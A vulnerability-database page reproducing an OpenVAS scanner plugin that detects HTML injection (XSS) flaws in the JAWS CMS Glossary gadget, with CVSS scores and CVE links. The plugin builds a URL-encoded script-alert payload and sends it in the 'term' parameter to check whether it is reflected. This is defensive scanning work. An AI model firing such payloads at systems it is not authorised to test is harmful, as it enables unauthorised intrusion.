Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2005 Josh Zlatin-AmishavOPENVAS:136141256231019394
HistoryMar 26, 2006 - 12:00 a.m.

JAWS HTML injection vulnerabilities

2006-03-2600:00:00
Copyright (C) 2005 Josh Zlatin-Amishav
plugins.openvas.org
15

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.7 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

60.2%

JSON

The remote version of JAWS does not perform a proper validation of
user-supplied input to several variables used in the

# SPDX-FileCopyrightText: 2005 Josh Zlatin-Amishav
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.19394");
  script_version("2023-12-13T05:05:23+0000");
  script_tag(name:"last_modification", value:"2023-12-13 05:05:23 +0000 (Wed, 13 Dec 2023)");
  script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
  script_cve_id("CVE-2005-1231", "CVE-2005-1800");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_name("JAWS HTML injection vulnerabilities");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2005 Josh Zlatin-Amishav");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "cross_site_scripting.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"http://seclists.org/lists/fulldisclosure/2005/Apr/0416.html");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/13254");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/13796");
  script_xref(name:"URL", value:"http://lists.grok.org.uk/pipermail/full-disclosure/2005-May/034354.html");

  script_tag(name:"solution", value:"Upgrade to JAWS 0.5.2 or later.");

  script_tag(name:"summary", value:"The remote version of JAWS does not perform a proper validation of
  user-supplied input to several variables used in the 'GlossaryModel.php' script, and is therefore
  vulnerable to cross-site scripting attacks.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("url_func.inc");
include("misc_func.inc");

vtstrings = get_vt_strings();

xss = "<script>alert('" + vtstrings["lowercase_rand"] + "');</script>";
# nb: the url-encoded version is what we need to pass in.
exss = urlencode( str:xss );

exploits = make_list(
  string("gadget=Glossary&action=ViewTerm&term=", exss), # for 0.5.x
  string("gadget=Glossary&action=view&term=", exss) # for 0.4.x
);

port = http_get_port( default:80 );
if( ! http_can_host_php( port:port ) ) exit( 0 );
host = http_host_name( dont_add_port:TRUE );
if( http_get_has_generic_xss( port:port, host:host ) ) exit( 0 );

foreach dir( make_list_unique( "/", http_cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";

  foreach exploit( exploits ) {

    url = string( dir, "/index.php?", exploit );

    req = http_get( item:url, port:port );
    res = http_keepalive_send_recv( port:port, data:req );

    if( res =~ "^HTTP/1\.[01] 200" && 'Term does not exists' >< res && xss >< res ) {
      report = http_report_vuln_url( port:port, url:url );
      security_message( port:port, data:report );
      exit( 0 );
    }
  }
}

exit( 0 );

Related

nessus 1
cve 2
nvd 2
cvelist 2
nessus
nessus
JAWS Glossary Gadget Multiple XSS
2005-08-08 00:00:00
cve
cve
CVE-2005-1800
2005-06-01 04:00:00
CVE-2005-1231
2005-05-02 04:00:00
nvd
nvd
CVE-2005-1800
2005-05-28 04:00:00
CVE-2005-1231
2005-05-02 04:00:00
cvelist
cvelist
CVE-2005-1800
2005-06-01 04:00:00
CVE-2005-1231
2005-04-24 04:00:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.7 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

60.2%

JSON
Related for OPENVAS:136141256231019394
nessus1cve2nvd2cvelist2